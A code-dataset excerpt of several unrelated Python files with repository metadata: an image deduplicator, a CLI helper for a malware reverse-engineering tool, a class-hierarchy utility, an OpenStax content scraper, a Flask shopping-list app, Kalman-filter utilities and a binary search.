| 26.393939 | 83 | 0.718714 | 122 | 871 | 5.098361 | 0.47541 | 0.062701 | 0.07717 | 0.101286 | 0.257235 | 0.257235 | 0.205788 | 0.205788 | 0.205788 | 0.205788 | 0 | 0.04712 | 0.122847 | 871 | 32 | 84 | 27.21875 | 0.767016 | 0.129736 | 0 | 0.095238 | 0 | 0 | 0.183267 | 0.061089 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.047619 | 0.238095 | 0 | 0.285714 | 0.190476 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3916c639b5db2d10c51e8dc556530287daecff0c | 2,781 | py | Python | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | 1 | 2020-05-31T13:02:48.000Z | 2020-05-31T13:02:48.000Z | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | null | null | null | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | null | null | null | from PIL import Image
import imagehash
import os
import pandas as pd
class RemoveDuplicate:
def __init__(self,img_ds_path, csv_file_path = None, csv_file_name = 'dataset.csv'):
self.img_ds_path = img_ds_path
self.hash_db = set()
self.count_duplicate = 0
self.count_corrupt = 0
if(csv_file_path == None):
self.csv_file_path = os.path.dirname(img_ds_path)
else:
self.csv_file_path = csv_file_path
self.csv_file_name = csv_file_name
def rm_duplicate_img(self):
if(os.path.exists(self.csv_file_path)):
ds_df = pd.read_csv(os.path.join(self.csv_file_path,self.csv_file_name))
if(os.path.exists(self.img_ds_path)):
img_db = os.listdir(self.img_ds_path)
for i in range(len(ds_df['image_name'])):
img_name = ds_df['image_name'][i]
if(img_name not in img_db):
# print('\n',ds_df['image_name'].iloc[i],ds_df['action'].iloc[i], '--- REMOVED from csv file---' ,'\n')
print('\n Index : ',i ,'--- REMOVED from csv file---\n')
ds_df.drop(i, axis=0, inplace = True)
self.count_corrupt += 1
else:
img = Image.open(os.path.join(self.img_ds_path,img_name))
hash = imagehash.phash(img)
if(hash in self.hash_db):
os.remove(os.path.join(self.img_ds_path,img_name))
ds_df.drop(i, axis=0, inplace = True)
print('\n',img_name, '--- REMOVED from dataset and csv file ---','\n')
self.count_duplicate += 1
else:
self.hash_db.add(hash)
print('Checked: ',img_name)
img = None
img_db.remove(img_name)
if(len(img_db) != 0):
for img_name in img_db:
os.remove(os.path.join(self.img_ds_path,img_name))
print('\n',img_name, '--- REMOVED from dataset ---','\n')
print('\n"No. of corrupted csv entries found and deleted : ',self.count_corrupt)
print('\n"No. of duplicate images found and deleted : ',self.count_duplicate)
print('\nNo of unaccounted files : ',len(img_db))
ds_df.to_csv(os.path.join(self.csv_file_path,'dataset.csv'), index = False)
print('\nUpdated CSV file saved\n')
else:
print("Image DataSet Path do not exist")
else:
print("CSV file path do not exist")
| 44.142857 | 127 | 0.512046 | 359 | 2,781 | 3.72702 | 0.214485 | 0.088939 | 0.060538 | 0.068012 | 0.352018 | 0.268311 | 0.238416 | 0.161435 | 0.082212 | 0.059791 | 0 | 0.004011 | 0.372528 | 2,781 | 62 | 128 | 44.854839 | 0.762751 | 0.036318 | 0 | 0.173077 | 0 | 0 | 0.141524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0 | 0.134615 | 0.192308 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3918401a1115c32350535dad538e1deab5215e1f | 1,327 | py | Python | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 3 | 2020-08-10T04:24:45.000Z | 2022-03-16T07:22:11.000Z | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 15 | 2020-08-09T22:01:32.000Z | 2022-03-18T04:15:53.000Z | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 2 | 2021-02-04T16:25:57.000Z | 2021-12-20T20:07:58.000Z | """
argparse.py
Argument parser helper for both the UWSGI runner and CLI
Credits: https://mike.depalatis.net/blog/simplifying-argparse.html
"""
import sys
import argparse
HEADER = """
___.
\_ |__ _________
| __ \ / _ \__ \
| \_\ ( <_> ) __ \_
|___ /\____(____ /
\/ \/
Reverse Engineering Framework for Python-Compiled Malware/Apps
"""
# globally instantiated parser for simplified subcommand parsing
cli = argparse.ArgumentParser(
description="Python Malware/App Reverse Engineering Framework"
)
subparsers = cli.add_subparsers(dest="subcommand")
def argument(*name_or_flags, **kwargs):
""" Helper method to format arguments for subcommand decorator """
return (list(name_or_flags), kwargs)
def subcommand(args=[], parent=subparsers):
""" Implements decorator for instantiating subcommand. """
def decorator(func):
parser = parent.add_parser(func.__name__, description=func.__doc__)
for arg in args:
parser.add_argument(*arg[0], **arg[1])
parser.set_defaults(func=func)
return decorator
def parse_args():
""" Entry for argument parsing """
args = cli.parse_args()
if args.subcommand is None:
cli.print_help()
else:
print(HEADER)
sys.exit(args.func(args))
| 25.037736 | 75 | 0.654861 | 144 | 1,327 | 5.652778 | 0.513889 | 0.044226 | 0.066339 | 0.041769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001955 | 0.229088 | 1,327 | 52 | 76 | 25.519231 | 0.793744 | 0.262999 | 0 | 0 | 0 | 0 | 0.271008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.064516 | 0 | 0.258065 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39190f6f95541bce0a5214eb986ad0051aecedc4 | 2,420 | py | Python | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 11 | 2020-09-24T02:12:22.000Z | 2022-03-11T09:55:08.000Z | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 2 | 2020-09-24T02:17:53.000Z | 2021-03-10T00:59:47.000Z | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 3 | 2021-04-08T05:45:36.000Z | 2021-12-30T19:18:15.000Z | import networkx as nx
import pandas as pd
import numpy as np
class hierarchy:
G=nx.DiGraph()
def __init__(self,nodes):
self.G.add_node('0', depth = 0)
n = open(nodes,'r')
for line in n.readlines():
self.get_nodes(line.strip())
def get_nodes(self,line):
node_name=""
edge_name=""
nodes = []
edges = []
edges.append(['0',line.split('.')[0]])
for i in line.split('.'):
node_name+= i
self.G.add_node(node_name, depth = len(node_name.split('.')))
node_name+= '.'
aux = []
edge_name=line.split('.')[0]
aux.append(edge_name)
for i in range(len(line.split('.'))-1):
edge_name+= '.'
edge_name+= line.split('.')[i+1]
aux.append(edge_name)
edges.append(aux)
aux = []
aux.append(edge_name)
self.G.add_edges_from(edges)
def stats(self):
for i in range(self.getHeight()+1):
print('level' + str(i))
print(self.getNodesByLevel(i))
print(len(self.getNodesByLevel(i)))
def removeNonLeafs(self,df):
non_leafs = set(self.G.nodes())-set(self.getLeafs())
df2 = pd.DataFrame.copy(df)
for i in non_leafs:
df2 = df2[df2.classification != i]
return(df2)
def getLeafs(self):
leafs = []
for node in self.G.nodes():
if not self.G.neighbors(node):
leafs.append(node)
return(set(leafs))
def getHeight(self):
return(max([y['depth'] for x,y in self.G.nodes(data=True)]))
def getNodesByLevel(self,depth):
return([x for x,y in self.G.nodes(data=True) if y['depth']==depth])
def getInnerNodes(self,root,desc):
for node in self.G.neighbors(root):
if self.G.neighbors(node):
desc.append(node)
self.getInnerNodes(node,desc)
def getDataFromInnerNodes(self,df):
desc = []
self.getInnerNodes('0',desc)
desc.append('0')
data = {}
for node in desc:
data[node] = self.getDataByParent(node,df)
return(data)
def getDataByParent(self,parentNode,df):
df2 = pd.DataFrame.copy(df)
if (df2['classification'] == parentNode).any():
df2.loc[df2['classification']==parentNode, 'classification'] = '#' + parentNode
for i in self.G.neighbors(parentNode):
df2.loc[df2.classification.str.startswith(i + "."),'classification'] = str(i)
for i in set(self.G.nodes())- set(self.G.neighbors(parentNode)):
df2 = df2[df2.classification!=i]
df2 = df2.reset_index(drop=True)
return(df2)
def getDescendants(self,node):
return(self.G.neighbors(node))
| 30.632911 | 83 | 0.642975 | 356 | 2,420 | 4.300562 | 0.219101 | 0.045722 | 0.023514 | 0.033312 | 0.165251 | 0.058785 | 0.032658 | 0.032658 | 0.032658 | 0 | 0 | 0.013623 | 0.180992 | 2,420 | 78 | 84 | 31.025641 | 0.758829 | 0 | 0 | 0.142857 | 0 | 0 | 0.036721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.038961 | 0.038961 | 0.207792 | 0.038961 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3919b6d798e6bab79283dcfc695bccf752daf541 | 12,058 | py | Python | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | null | null | null | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | 4 | 2017-09-25T19:39:26.000Z | 2019-01-11T17:19:13.000Z | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import copy
import os
import sys;
sys.path.append(os.getcwd()) # Handle relative imports
from ricecooker.utils import downloader, html_writer
from ricecooker.chefs import SushiChef
from ricecooker.classes import nodes, files
from ricecooker.config import LOGGER # Use logger to print messages
from ricecooker.exceptions import raise_for_invalid_channel
""" Additional imports """
###########################################################
import logging
import json
from le_utils.constants import licenses, file_formats, roles
from bs4 import BeautifulSoup
import cssutils
from utils.pdf import PDFParser
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPM
""" Run Constants"""
###########################################################
CHANNEL_NAME = "Open Stax" # Name of channel
CHANNEL_SOURCE_ID = "open-stax" # Channel's unique id
CHANNEL_DOMAIN = "openstax.org" # Who is providing the content
CHANNEL_LANGUAGE = "en" # Language of channel
CHANNEL_DESCRIPTION = None # Description of the channel (optional)
CHANNEL_THUMBNAIL = "https://pbs.twimg.com/profile_images/461533721493897216/Q-kxGJ-b_400x400.png" # Local path or url to image file (optional)
""" Additional Constants """
###########################################################
BASE_URL = "https://openstax.org/api"
DOWNLOAD_DIRECTORY = os.path.sep.join([os.path.dirname(os.path.realpath(__file__)), "downloads"])
THUMBNAILS_DIRECTORY = os.path.sep.join([os.path.dirname(os.path.realpath(__file__)), "downloads", "thumbnails"])
# Create download directory if it doesn't already exist
if not os.path.exists(DOWNLOAD_DIRECTORY):
os.makedirs(DOWNLOAD_DIRECTORY)
# Create thumbnails directory if it doesn't already exist
if not os.path.exists(THUMBNAILS_DIRECTORY):
os.makedirs(THUMBNAILS_DIRECTORY)
# Map for Open Stax licenses to le_utils license constants
LICENSE_MAPPING = {
"Creative Commons Attribution License": licenses.CC_BY,
"Creative Commons Attribution-NonCommercial-ShareAlike License": licenses.CC_BY_NC_SA,
}
COPYRIGHT_HOLDER = "Rice University"
""" The chef class that takes care of uploading channel to the content curation server. """
class MyChef(SushiChef):
channel_info = { # Channel Metadata
'CHANNEL_SOURCE_DOMAIN': CHANNEL_DOMAIN, # Who is providing the content
'CHANNEL_SOURCE_ID': CHANNEL_SOURCE_ID, # Channel's unique id
'CHANNEL_TITLE': CHANNEL_NAME, # Name of channel
'CHANNEL_LANGUAGE': CHANNEL_LANGUAGE, # Language of channel
'CHANNEL_THUMBNAIL': CHANNEL_THUMBNAIL, # Local path or url to image file (optional)
'CHANNEL_DESCRIPTION': CHANNEL_DESCRIPTION, # Description of the channel (optional)
}
""" Main scraping method """
###########################################################
def construct_channel(self, *args, **kwargs):
""" construct_channel: Creates ChannelNode and build topic tree
OpenStax is organized with the following hierarchy:
Subject (Topic)
| Book (Topic)
| | Main High Resolution PDF (DocumentNode)
| | Main Low Resolution PDF (DocumentNode)
| | Instructor Resources (Topic)
| | | Resource PDF (DocumentNode)
| | Student Resources (Topic)
| | | Resource PDF (DocumentNode)
Returns: ChannelNode
"""
LOGGER.info("Constructing channel from {}...".format(BASE_URL))
channel = self.get_channel(*args, **kwargs) # Creates ChannelNode from data in self.channel_info
contents = read_source() # Get json data from page
for book in contents.get('books'):
subject = book.get('subject')
# Get subject, add if not available
subject_node = next((child for child in channel.children if child.source_id == subject), None)
if not subject_node:
subject_node = nodes.TopicNode(source_id=subject, title=subject)
channel.add_child(subject_node)
content = read_source(endpoint=book.get('slug')) # Read detailed page for content
if not content: # Skip to next item if nothing is found
continue
# Format licensing metadata for content
auth_info = {
"license": LICENSE_MAPPING[content.get('license_name')],
"license_description": content.get('license_text'),
"copyright_holder": COPYRIGHT_HOLDER,
}
# Format content metadata for content
authors = ", ".join([a['value']['name'] for a in content['authors'][:5]])
authors = authors + " et. al." if len(content['authors']) > 5 else authors
details = {
"description": parse_description(content.get('description')),
"thumbnail": get_thumbnail(content.get('cover_url')),
"author": authors,
}
# Add book topic
book_node = nodes.TopicNode(
source_id=str(content.get('cnx_id')),
title=content.get('title'),
description=details.get('description'),
thumbnail=details.get('thumbnail'),
)
subject_node.add_child(book_node)
# Create high resolution document
LOGGER.info(" Writing {} documents...".format(book.get('title')))
add_file_node(book_node, content.get("low_resolution_pdf_url") or content.get("high_resolution_pdf_url"), \
content['title'], split=True, contents=content['table_of_contents']['contents'], **auth_info, **details)
# Create student handbook document
if content.get("student_handbook_url"):
add_file_node(book_node, content["student_handbook_url"], "Student Handbook", source_id="student-handbook", **auth_info, **details)
# Parse resource materials
LOGGER.info(" Writing {} resources...".format(book.get('title')))
parse_resources("Instructor Resources", content.get('book_faculty_resources'), book_node, role=roles.COACH, **auth_info)
parse_resources("Student Resources", content.get('book_student_resources'), book_node, **auth_info)
raise_for_invalid_channel(channel) # Check for errors in channel construction
return channel
""" Helper Methods """
###########################################################
def read_source(endpoint="books"):
""" Reads page source using downloader class to get json data """
page_contents = downloader.read("{baseurl}/{endpoint}".format(baseurl=BASE_URL, endpoint=endpoint))
return json.loads(page_contents) # Open Stax url returns json object
def get_thumbnail(url):
filename, _ext = os.path.splitext(os.path.basename(url))
img_path = os.path.sep.join([THUMBNAILS_DIRECTORY, "{}.png".format(filename)])
svg_path = os.path.sep.join([THUMBNAILS_DIRECTORY, "{}.svg".format(filename)])
# This thumbnail gets converted with an error, so download it separately for now
if "US_history" in filename:
return files.ThumbnailFile(path="US_history.png")
# Copy pngs to local storage
if url.endswith("png"):
with open(img_path, 'wb') as pngobj:
pngobj.write(downloader.read(url))
elif url.endswith("svg"):
with open(svg_path, 'wb') as svgobj:
# renderPM doesn't read <style> tags, so add style to individual elements
svg_contents = BeautifulSoup(downloader.read(url), 'html.parser')
svg_contents = BeautifulSoup(svg_contents.find('svg').prettify(), 'html.parser')
if svg_contents.find('style'):
sheet = cssutils.parseString(svg_contents.find('style').string)
for rule in sheet:
rectangles = svg_contents.find_all('rect', {'class': rule.selectorText.lstrip('.')})
paths = svg_contents.find_all('path', {'class': rule.selectorText.lstrip('.')})
polygons = svg_contents.find_all('polygon', {'class': rule.selectorText.lstrip('.')})
for el in rectangles + paths + polygons:
el['style'] = ""
for prop in rule.style:
el['style'] += "{}:{};".format(prop.name, prop.value)
# Beautifulsoup autocorrects some words to be all lowercase, so undo correction
autocorrected_fields = ["baseProfile", "viewBox"]
svg = svg_contents.find('svg')
for field in autocorrected_fields:
if svg.get(field.lower()):
svg[field] = svg[field.lower()]
del svg[field.lower()]
svgobj.write(svg_contents.renderContents())
drawing = svg2rlg(svg_path)
renderPM.drawToFile(drawing, img_path)
else:
import pdb; pdb.set_trace()
return files.ThumbnailFile(path=img_path)
def parse_description(description):
""" Removes html tags from description """
return BeautifulSoup(description or "", "html5lib").text
def parse_resources(resource_name, resource_data, book_node, **auth_info):
""" Creates resource topics """
resource_data = resource_data or []
resource_str = "{}-{}".format(book_node.source_id, resource_name.replace(' ', '-').lower())
# Create resource topic
resource_node = nodes.TopicNode(source_id=resource_str, title=resource_name)
book_node.add_child(resource_node)
# Add resource documents
for resource in resource_data:
if resource.get('link_document_url') and resource['link_document_url'].endswith(".pdf"):
description = parse_description(resource.get('resource_description'))
add_file_node(resource_node, resource.get("link_document_url"), resource.get('resource_heading'), description=description, **auth_info)
JSONDATA = {}
with open("pages.json", "rb") as jsonfile:
JSONDATA = json.load(jsonfile)
def add_file_node(target_node, url, title, split=False, contents=None, source_id=None, **details):
""" Creates file nodes at target topic node """
if split:
book_node = nodes.TopicNode(
source_id=source_id or target_node.source_id + "-main",
title=title,
description=details.get('description'),
thumbnail=details.get('thumbnail'),
)
target_node.add_child(book_node)
chapters = []
chapter_details = copy.deepcopy(details)
del chapter_details['description']
with PDFParser(url, directory=DOWNLOAD_DIRECTORY) as parser:
chapters = parser.split_chapters(jsondata=JSONDATA.get(book_node.source_id))
for index, chapter in enumerate(chapters):
source_id = contents[index]['id'] if index < len(contents) else "{}-{}".format(book_node.source_id, index)
create_document_node(chapter['path'], chapter['title'], book_node, source_id, **chapter_details)
else:
create_document_node(url, title, target_node, source_id or target_node.source_id, **details)
def create_document_node(path, title, target_node, source_id, **details):
document_file = files.DocumentFile(path)
document_id = title.replace(" ", "-").lower()
target_node.add_child(nodes.DocumentNode(
source_id="{}-{}".format(source_id, document_id),
title=title,
files=[document_file],
**details
))
""" This code will run when the sushi chef is called from the command line. """
if __name__ == '__main__':
chef = MyChef()
chef.main() | 44.659259 | 147 | 0.619423 | 1,331 | 12,058 | 5.435011 | 0.246431 | 0.02433 | 0.013271 | 0.007188 | 0.160354 | 0.102018 | 0.077965 | 0.060271 | 0.051147 | 0.033177 | 0 | 0.003319 | 0.250373 | 12,058 | 270 | 148 | 44.659259 | 0.796991 | 0.159977 | 0 | 0.059172 | 0 | 0 | 0.133669 | 0.015625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04142 | false | 0 | 0.100592 | 0 | 0.183432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391af0070ec9aa055f9fe705531d28f9338b23ac | 1,966 | py | Python | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | from flask import Flask, request, flash
from flask import render_template
from flask import redirect
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///listasuper.sqlite3'
app.config['SECRET_KEY'] = 'uippc3'
db = SQLAlchemy(app)
class Super(db.Model):
id = db.Column(db.Integer, primary_key=True)
content = db.Column(db.String)
cantidad = db.Column(db.Integer)
precio = db.Column(db.Float)
listo = db.Column(db.Boolean, default=False)
def __init__(self, content,precio, cantidad):
self.content = content
self.precio = precio
self.cantidad = cantidad
self.listo = False
db.create_all()
@app.route('/')
def supers_list():
supers = Super.query.all()
return render_template('mostrar_todo.html', supers=supers)
@app.route('/super', methods=['POST'])
def add_super():
content = request.form.get('content')
precio = request.form.get('precio')
cantidad = request.form.get('cantidad')
if not request.form['content'] or not request.form['precio']:
flash('Debes ingresar un texto')
return redirect('/')
super = Super(content, precio,cantidad)
db.session.add(super)
db.session.commit()
flash('Registro guardado con exito!')
return redirect('/')
@app.route('/delete/<int:super_id>')
def delete_super(super_id):
super = Super.query.get(super_id)
if not super:
return redirect('/')
db.session.delete(super)
db.session.commit()
flash('Se borro con exito!')
return redirect('/')
@app.route('/listo/<int:super_id>')
def resolve_super(super_id):
super = Super.query.get(super_id)
if not super:
return redirect('/')
if super.listo:
super.listo = False
else:
super.listo = True
db.session.commit()
return redirect('/')
app.static_folder = 'static'
if __name__ == '__main__':
db.create_all()
app.run() | 23.97561 | 70 | 0.660732 | 255 | 1,966 | 4.94902 | 0.309804 | 0.066561 | 0.03962 | 0.026941 | 0.183835 | 0.144216 | 0.096672 | 0.096672 | 0.096672 | 0.096672 | 0 | 0.001267 | 0.196846 | 1,966 | 82 | 71 | 23.97561 | 0.797973 | 0 | 0 | 0.245902 | 0 | 0 | 0.133198 | 0.047789 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.065574 | 0 | 0.360656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391b9c72800385ae9692b6e6dd7debb52f9635d1 | 4,309 | py | Python | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | import scipy.io
from matplotlib import pyplot as plt
import numpy as np
def load_imu_data():
dt = 0.01
gyro_data = scipy.io.loadmat('./source/11.ARS/ArsGyro.mat')
acce_data = scipy.io.loadmat('./source/11.ARS/ArsAccel.mat')
ts = np.arange(len(gyro_data['wz'])) * dt
gyro = np.concatenate([
gyro_data['wx'],
gyro_data['wy'],
gyro_data['wz'],
], axis=1)
acce = np.concatenate([
acce_data['fx'],
acce_data['fy'],
acce_data['fz'],
], axis=1)
return dt, ts, gyro, acce
def load_sonar_data():
sonar_data = scipy.io.loadmat('./source/2.MovAvgFilter/SonarAlt.mat')['sonarAlt'].reshape(-1)[:500]
dt = 0.02
ts = np.arange(len(sonar_data)) * dt
return dt, ts, sonar_data[:500]
def generate_volt_data():
while True:
yield np.random.normal(14.4, 4)
def generate_pos_vel_data(dt=0.1):
pos = 0
vel = 80
while True:
w = np.random.normal(0, 10)
v = np.random.normal(0, 10)
pos += vel * dt
yield pos + v, vel
vel = 80 + w
def generate_radar_measurement_data(dt):
pos = 0
while True:
vel = np.random.normal(100, 5)
alt = np.random.normal(1000, 10)
pos = pos + vel*dt
v = np.random.normal(0, pos * 0.05)
r = (pos**2 + alt**2)**0.5 + v
yield r
def run_radar_position_estimation(kf, ts, measurements_seq):
measurements = []
estimations = []
speeds = []
altitudes = []
positions = []
for t, meas in zip(ts, measurements_seq):
kf.update(np.array([[meas]]))
state = kf.x.copy()
measurements.append(meas)
estimations.append(kf.h(state)[0, 0])
pos, spd, alt = state.reshape(3)
positions.append(pos)
speeds.append(spd)
altitudes.append(alt)
return measurements, estimations, speeds, altitudes, positions
def run_euler_attitude_estimation(kf, ts, gyro, acce):
estimations = []
for i, (g, a) in enumerate(zip(gyro, euler_from_acce(acce))):
kf.gyro = g.reshape(3, 1)
kf.update(a[:2].reshape(2, 1))
estimations.append(kf.get().reshape(1, 2))
return np.concatenate(estimations) * 180 / np.pi
def plot_xyz(ts, xyz, title=''):
fig = plt.figure(figsize=[16, 12])
fig.suptitle(title)
for i, ax, color in zip(range(xyz.shape[1]), 'xyz', 'rgb'):
fig.add_subplot(3, 1, i+1)
plt.plot(ts, xyz[:, i], color=color)
plt.ylabel(ax)
plt.xlabel('Time[sec]')
plt.show()
def plot_radar_result(ts, speeds, altitudes, positions):
def plot(ts, values, ylabel):
plt.figure(figsize=[12, 6])
plt.plot(ts, values)
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.show()
plot(ts, speeds, 'Speed[m/s]')
plot(ts, altitudes, 'Altitude[m]')
plot(ts, positions, 'Position[m]')
def plot_measurement_vs_estimation(ts, measurements, estimations, ylabel=''):
plt.figure(figsize=[12, 9])
plt.plot(ts, measurements, '--', label='measured')
plt.plot(ts, estimations, label='estimated')
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.legend()
plt.show()
def euler_from_gyro(ts, gyro):
attitude = np.array([[0, 0, 0]]).T
res = np.zeros((len(ts), 3), dtype=float)
for i, (dt, pqr) in enumerate(zip(ts[1:] - ts[:-1], gyro)):
phi, theta, _ = attitude.reshape(-1)
sin_phi = np.sin(phi)
cos_phi = np.cos(phi)
cos_theta = np.cos(theta)
tan_theta = np.tan(theta)
to_euler = np.array([
[1, sin_phi * tan_theta, cos_phi * tan_theta],
[0, cos_phi, -sin_phi],
[0, sin_phi * cos_theta, cos_phi * cos_theta],
])
attitude = attitude + dt * to_euler @ pqr.reshape(3, 1)
res[i+1] = attitude.reshape(-1)
return res
def euler_from_acce(acce):
g = 9.8
theta = np.arcsin(acce[:, 0] / g)
phi = np.arcsin(-acce[:, 1] / (g * np.cos(theta)))
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
def euler_from_acce2(acce):
x, y, z = acce.T
phi = np.arctan2(y, z)
theta = np.arctan2(x, (y**2 + z**2)**0.5)
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
| 26.598765 | 103 | 0.571362 | 625 | 4,309 | 3.8336 | 0.248 | 0.020033 | 0.035058 | 0.022538 | 0.184474 | 0.085977 | 0.085977 | 0.06177 | 0.033389 | 0.033389 | 0 | 0.034777 | 0.265955 | 4,309 | 161 | 104 | 26.763975 | 0.722732 | 0 | 0 | 0.155738 | 0 | 0 | 0.045718 | 0.021119 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.02459 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391c545fe97dbf90b53cd05bbc8214ed5d823aa1 | 1,119 | py | Python | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | import typing
def binary_search(
predicate: typing.Callable[[int], bool],
lower_bound: int,
upper_bound: int,
) -> typing.Optional[int]:
"""
Find the positive integer threshold below which a search criteria is never
satisfied and above which it is always satisfied.
Parameters
----------
predicate : callable object
Returns whether an integer value satisfies the search criteria.
lower_bound : int
Lower bound for the binary search, inclusive.
upper_bound : int
Upper bound for the binary search, inclusive.
Returns
-------
guess
The lowest integer value that satisfies the search criteria, and None
if upper_bound does not satisfy the search criteria.
"""
if lower_bound == upper_bound:
if predicate(lower_bound):
return lower_bound
else:
return None
midpoint = (lower_bound + upper_bound) // 2
if predicate(midpoint):
return binary_search(predicate, lower_bound, midpoint)
else:
return binary_search(predicate, midpoint + 1, upper_bound)
